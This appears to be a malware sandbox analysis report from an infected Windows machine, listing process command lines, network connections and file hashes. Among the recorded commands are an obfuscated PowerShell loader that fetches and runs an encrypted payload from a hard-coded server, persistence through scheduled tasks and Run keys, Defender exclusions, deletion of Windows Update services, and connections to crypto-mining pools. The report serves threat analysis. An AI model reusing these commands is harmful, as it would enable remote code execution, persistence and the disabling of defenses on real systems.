C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\27DE.exe
C:\Users\Admin\AppData\Local\Temp\27DE.exe
C:\Users\Admin\AppData\Local\Temp\3F30.exe
C:\Users\Admin\AppData\Local\Temp\3F30.exe
C:\Users\Admin\AppData\Local\Temp\4173.exe
C:\Users\Admin\AppData\Local\Temp\4173.exe
C:\Users\Admin\AppData\Local\Temp\42FA.exe
C:\Users\Admin\AppData\Local\Temp\42FA.exe
C:\Users\Admin\AppData\Local\Temp\ss31.exe
"C:\Users\Admin\AppData\Local\Temp\ss31.exe"
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
C:\Users\Admin\AppData\Local\Temp\5616.exe
C:\Users\Admin\AppData\Local\Temp\5616.exe
C:\Users\Admin\AppData\Local\Temp\42FA.exe
C:\Users\Admin\AppData\Local\Temp\42FA.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 780
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\a21aa4a2-2388-4a0c-8d42-caa3b3f83d0e" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F
C:\Users\Admin\AppData\Local\Temp\42FA.exe
"C:\Users\Admin\AppData\Local\Temp\42FA.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\68F3.exe
C:\Users\Admin\AppData\Local\Temp\68F3.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 780
C:\Users\Admin\AppData\Local\Temp\7420.exe
C:\Users\Admin\AppData\Local\Temp\7420.exe
C:\Users\Admin\AppData\Local\Temp\79BE.exe
C:\Users\Admin\AppData\Local\Temp\79BE.exe
C:\Users\Admin\AppData\Local\Temp\42FA.exe
"C:\Users\Admin\AppData\Local\Temp\42FA.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\83B2.exe
C:\Users\Admin\AppData\Local\Temp\83B2.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $anemoneAccoast = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $undoneBasalt = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTEwMTg=')); $urledAnemone = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Y2IxYTM=')); $drollyAdopted = new-object System.Net.Sockets.TcpClient; $drollyAdopted.Connect($anemoneAccoast, [int]$undoneBasalt); $croodUndone = $drollyAdopted.GetStream(); $drollyAdopted.SendTimeout = 300000; $drollyAdopted.ReceiveTimeout = 300000; $anemoneUrled = [System.Text.StringBuilder]::new(); $anemoneUrled.AppendLine('GET /' + $urledAnemone); $anemoneUrled.AppendLine('Host: ' + $anemoneAccoast); $anemoneUrled.AppendLine(); $drollyBasalt = [System.Text.Encoding]::ASCII.GetBytes($anemoneUrled.ToString()); $croodUndone.Write($drollyBasalt, 0, $drollyBasalt.Length); $croodAnemone = New-Object System.IO.MemoryStream; $croodUndone.CopyTo($croodAnemone); $croodUndone.Dispose(); $drollyAdopted.Dispose(); $croodAnemone.Position = 0; $accoastAdopted = $croodAnemone.ToArray(); $croodAnemone.Dispose(); $adoptedUndone = [System.Text.Encoding]::ASCII.GetString($accoastAdopted).IndexOf('`r`n`r`n')+1; $urledDrolly = [System.Text.Encoding]::ASCII.GetString($accoastAdopted[$adoptedUndone..($accoastAdopted.Length-1)]); $urledDrolly = [System.Convert]::FromBase64String($urledDrolly); $adoptedTaipans = New-Object System.Security.Cryptography.AesManaged; $adoptedTaipans.Mode = [System.Security.Cryptography.CipherMode]::CBC; $adoptedTaipans.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $adoptedTaipans.Key = [System.Convert]::FromBase64String('REh1kjJGknER9Hy/8Kp1GmdthqGx+srHUlsWBbnCLIM='); $adoptedTaipans.IV = [System.Convert]::FromBase64String('biNlJbw5kJdQtvBXtmkf9A=='); $accoastBasalt = $adoptedTaipans.CreateDecryptor(); $urledDrolly = $accoastBasalt.TransformFinalBlock($urledDrolly, 0, $urledDrolly.Length); $accoastBasalt.Dispose(); $adoptedTaipans.Dispose(); $adoptedYttrium = New-Object System.IO.MemoryStream(, $urledDrolly); $urledAccoast = New-Object System.IO.MemoryStream; $yttriumTaipans = New-Object System.IO.Compression.GZipStream($adoptedYttrium, [IO.Compression.CompressionMode]::Decompress); $yttriumTaipans.CopyTo($urledAccoast); $urledDrolly = $urledAccoast.ToArray(); $anemoneBasalt = [System.Reflection.Assembly]::Load($urledDrolly); $yttriumDrolly = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dW5uZXN0U2NvdXRlcg==')); $taipansAccoast = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('YmFzYWx0QWNjb2FzdA==')); $urledAdopted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dGFpcGFuc1l0dHJpdW0=')); $urledCrood = $anemoneBasalt.GetType($yttriumDrolly + '.' + $taipansAccoast); $drollyTaipans = $urledCrood.GetMethod($urledAdopted); $drollyTaipans.Invoke($undoneUrled, (, [string[]] (''))); #($undoneUrled, $undoneUrled);
C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe
"C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
C:\Users\Admin\AppData\Local\e333cf35-2a5f-41fb-a9d3-4819f7b9b05d\build2.exe
"C:\Users\Admin\AppData\Local\e333cf35-2a5f-41fb-a9d3-4819f7b9b05d\build2.exe"
C:\Users\Admin\AppData\Local\e333cf35-2a5f-41fb-a9d3-4819f7b9b05d\build3.exe
"C:\Users\Admin\AppData\Local\e333cf35-2a5f-41fb-a9d3-4819f7b9b05d\build3.exe"
C:\Users\Admin\AppData\Local\e333cf35-2a5f-41fb-a9d3-4819f7b9b05d\build2.exe
"C:\Users\Admin\AppData\Local\e333cf35-2a5f-41fb-a9d3-4819f7b9b05d\build2.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 788
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 780
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
C:\Users\Admin\AppData\Local\Temp\D202.exe
C:\Users\Admin\AppData\Local\Temp\D202.exe
C:\ProgramData\21184250497844656502.exe
"C:\ProgramData\21184250497844656502.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1E46.exe" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 1912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4760 -s 2448
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe zuhwtyqtfkk
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | potunulit.org | udp |
| US | 188.114.96.0:80 | potunulit.org | tcp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | leaderspro.ps | udp |
| PS | 109.73.242.14:443 | leaderspro.ps | tcp |
| US | 8.8.8.8:53 | 14.242.73.109.in-addr.arpa | udp |
| DE | 45.9.74.80:80 | 45.9.74.80 | tcp |
| EE | 91.235.234.235:80 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.220.83:11111 | 116.203.220.83 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.74.9.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.220.203.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.249.124.192.in-addr.arpa | udp |
| US | 82.117.255.127:80 | 82.117.255.127 | tcp |
| US | 8.8.8.8:53 | 127.255.117.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bz.bbbeioaag.com | udp |
| HK | 103.100.211.218:80 | bz.bbbeioaag.com | tcp |
| US | 8.8.8.8:53 | 218.211.100.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 254.217.0.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.155.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.18.104.in-addr.arpa | udp |
| AT | 77.73.134.27:80 | 77.73.134.27 | tcp |
| US | 8.8.8.8:53 | 27.134.73.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.4.107.13.in-addr.arpa | udp |
| NL | 5.252.118.57:80 | 5.252.118.57 | tcp |
| US | 8.8.8.8:53 | 57.118.252.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.13.109.52.in-addr.arpa | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | colisumy.com | udp |
| US | 8.8.8.8:53 | zexeq.com | udp |
| HU | 84.224.34.240:80 | colisumy.com | tcp |
| KR | 123.140.161.243:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | 240.34.224.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.161.140.123.in-addr.arpa | udp |
| KR | 123.140.161.243:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | adsmanager.facebook.com | udp |
| US | 157.240.5.12:443 | adsmanager.facebook.com | tcp |
| US | 8.8.8.8:53 | 12.5.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| DE | 157.240.20.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 35.20.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | count.iiagjaggg.com | udp |
| HK | 154.221.31.191:80 | count.iiagjaggg.com | tcp |
| US | 8.8.8.8:53 | 191.31.221.154.in-addr.arpa | udp |
| RU | 91.215.85.198:51018 | 91.215.85.198 | tcp |
| US | 8.8.8.8:53 | 198.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aapu.at | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 118.146.170.187.in-addr.arpa | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| CZ | 146.19.173.221:80 | 146.19.173.221 | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.55.52.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.175.53.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.173.19.146.in-addr.arpa | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | fakethedead.com | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| BZ | 78.142.29.185:443 | fakethedead.com | tcp |
| DE | 116.203.2.149:11111 | 116.203.2.149 | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 185.29.142.78.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.2.203.116.in-addr.arpa | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | janjackfrs.com | udp |
| RU | 45.143.137.122:80 | janjackfrs.com | tcp |
| US | 8.8.8.8:53 | hoh0aeghwugh2gie.com | udp |
| N/A | 185.161.248.41:80 | hoh0aeghwugh2gie.com | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 41.248.161.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 104.26.13.31:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 31.13.26.104.in-addr.arpa | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 121.252.72.23.in-addr.arpa | udp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| MX | 187.170.146.118:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| FR | 51.255.34.80:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 80.34.255.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| DE | 135.125.238.108:14433 | xmr-eu1.nanopool.org | tcp |
| DE | 116.203.2.149:11111 | 116.203.2.149 | tcp |
| US | 8.8.8.8:53 | 143.67.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.238.125.135.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.2.149:11111 | 116.203.2.149 | tcp |
Files
memory/2568-122-0x0000000002C30000-0x0000000002C39000-memory.dmp
memory/3252-123-0x0000000000D90000-0x0000000000DA6000-memory.dmp
memory/2568-124-0x0000000000400000-0x0000000002B91000-memory.dmp
memory/3252-132-0x0000000000DF0000-0x0000000000E00000-memory.dmp
memory/3252-134-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-137-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-139-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-140-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-141-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-142-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-145-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-146-0x0000000000F70000-0x0000000000F80000-memory.dmp
memory/3252-149-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-150-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-151-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-152-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-153-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-156-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-158-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-159-0x0000000000E40000-0x0000000000E50000-memory.dmp
memory/3252-160-0x0000000000E40000-0x0000000000E50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1E46.exe
| MD5 | 6b20cecdd6ed336dacaf9a4427d9ccbe |
| SHA1 | 38c7528dbe7299637e34b199997d9d4479188cd5 |
| SHA256 | 2dfef2864a041baf0ee84d71e4c92dc0e793605dece7be16c8d04df81483d9ab |
| SHA512 | 0663d79b7796ae3e7bb88d444297a7af0977164fe88501627326db6dc557ce8da0a07cb203e94cfa7a8ea003669dd492eb6e7ea9218cf0a4f3e4d0b72e36efa9 |
C:\Users\Admin\AppData\Local\Temp\1E46.exe
| MD5 | 6b20cecdd6ed336dacaf9a4427d9ccbe |
| SHA1 | 38c7528dbe7299637e34b199997d9d4479188cd5 |
| SHA256 | 2dfef2864a041baf0ee84d71e4c92dc0e793605dece7be16c8d04df81483d9ab |
| SHA512 | 0663d79b7796ae3e7bb88d444297a7af0977164fe88501627326db6dc557ce8da0a07cb203e94cfa7a8ea003669dd492eb6e7ea9218cf0a4f3e4d0b72e36efa9 |
C:\Users\Admin\AppData\Local\Temp\1FAE.exe
| MD5 | 2e9ae44f23fbf550b7e0dcfe161a1829 |
